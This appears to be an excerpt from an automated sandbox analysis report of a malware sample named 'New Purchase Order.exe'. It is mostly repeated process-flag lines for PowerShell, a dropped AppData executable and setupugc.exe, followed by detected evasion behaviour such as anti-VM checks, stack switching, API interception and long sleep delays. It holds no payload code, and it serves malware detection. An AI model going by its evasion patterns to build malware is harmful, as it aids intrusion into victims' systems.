            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Yara detected AntiVM3
            Source: Yara matchFile source: Process Memory Space: New Purchase Order.exe PID: 4988, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: hbaiQWstL.exe PID: 2308, type: MEMORYSTR
            Switches to a custom stack to bypass stack traces
            Source: C:\Windows\SysWOW64\setupugc.exeAPI/Special instruction interceptor: Address: 7FFDB442D324
            Source: C:\Windows\SysWOW64\setupugc.exeAPI/Special instruction interceptor: Address: 7FFDB442D7E4
            Source: C:\Windows\SysWOW64\setupugc.exeAPI/Special instruction interceptor: Address: 7FFDB442D944
            Source: C:\Windows\SysWOW64\setupugc.exeAPI/Special instruction interceptor: Address: 7FFDB442D504
            Source: C:\Windows\SysWOW64\setupugc.exeAPI/Special instruction interceptor: Address: 7FFDB442D544
            Source: C:\Windows\SysWOW64\setupugc.exeAPI/Special instruction interceptor: Address: 7FFDB442D1E4
            Source: C:\Windows\SysWOW64\setupugc.exeAPI/Special instruction interceptor: Address: 7FFDB4430154
            Source: C:\Windows\SysWOW64\setupugc.exeAPI/Special instruction interceptor: Address: 7FFDB442DA44
            Source: C:\Users\user\Desktop\New Purchase Order.exeMemory allocated: 13A0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeMemory allocated: 2E70000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeMemory allocated: 13A0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeMemory allocated: 8190000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeMemory allocated: 9190000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeMemory allocated: 9350000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeMemory allocated: A350000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeMemory allocated: 1850000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeMemory allocated: 34A0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeMemory allocated: 1870000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeMemory allocated: 7C80000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeMemory allocated: 8C80000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeMemory allocated: 8E10000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeMemory allocated: 9E10000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0181096E rdtsc 9_2_0181096E
            Source: C:\Users\user\Desktop\New Purchase Order.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3841Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4892Jump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeWindow / User API: threadDelayed 2313Jump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeWindow / User API: threadDelayed 7660Jump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeAPI coverage: 0.7 %
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeAPI coverage: 0.2 %
            Source: C:\Windows\SysWOW64\setupugc.exeAPI coverage: 2.6 %
            Source: C:\Users\user\Desktop\New Purchase Order.exe TID: 6336Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5344Thread sleep count: 3841 > 30Jump to behavior
